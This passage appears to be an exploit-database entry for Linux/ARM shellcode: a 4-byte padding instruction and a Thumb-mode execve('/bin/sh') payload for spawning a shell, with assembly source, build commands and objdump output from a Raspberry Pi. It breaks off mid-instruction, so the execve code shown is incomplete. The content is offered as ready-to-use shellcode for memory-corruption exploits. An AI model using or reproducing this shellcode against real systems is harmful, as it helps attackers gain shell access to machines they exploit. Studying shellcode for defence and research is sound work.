4-byte Linux/ARM jump-back shellcode + execve("/bin/sh", NULL, NULL) shellcode.
45872f193eae1e28e15f9a455e099d4b
/*
# Title: Linux/ARM - Jump Back Shellcode + execve("/bin/sh", NULL, NULL) Shellcode (4 Bytes)
# Date: 2018-09-18
# Author: Ken Kitahara
# Tested: armv7l (Raspberry Pi 3 Model B+)
[System Information]
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
pi@raspberrypi:~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Raspbian
Description: Raspbian GNU/Linux 9.4 (stretch)
Release: 9.4
Codename: stretch
pi@raspberrypi:~ $
[Shellcode]
(1) Use "eor r7, r7, r7" Shellcode as Padding Shellcode (4 Bytes)
pi@raspberrypi:~ $ cat padding.s
// padding.s — GNU as, ARM (A32) mode, Linux.
// Purpose: a single 4-byte ARM instruction used as filler ("padding") ahead of
// the execve stage shown below. It only clears r7 and has no other effect.
// Encoding (from the objdump output below): e0277007 — one word, no zero bytes.
.section .text
.global _start
_start:
eor r7, r7, r7        // r7 = r7 ^ r7 -> r7 = 0 (register-only, no memory access)
pi@raspberrypi:~ $ as -o padding.o padding.s && ld -N -o padding padding.o
pi@raspberrypi:~ $ objdump -d ./padding
./padding: file format elf32-littlearm
Disassembly of section .text:
00010054 <_start>:
10054: e0277007 eor r7, r7, r7
pi@raspberrypi:~ $
(2) execve("/bin/sh", NULL, NULL) Shellcode (27 Bytes)
pi@raspberrypi:~ $ cat shell.s
.section .text
.global _start
_start:
.ARM
add r3, pc, #1
bx r3
.THUMB
// execve("/bin/sh", NULL, NULL)
adr r0, spawn
eor r1, r1, r1
eor r2, r2, r2
strb r2, [r0,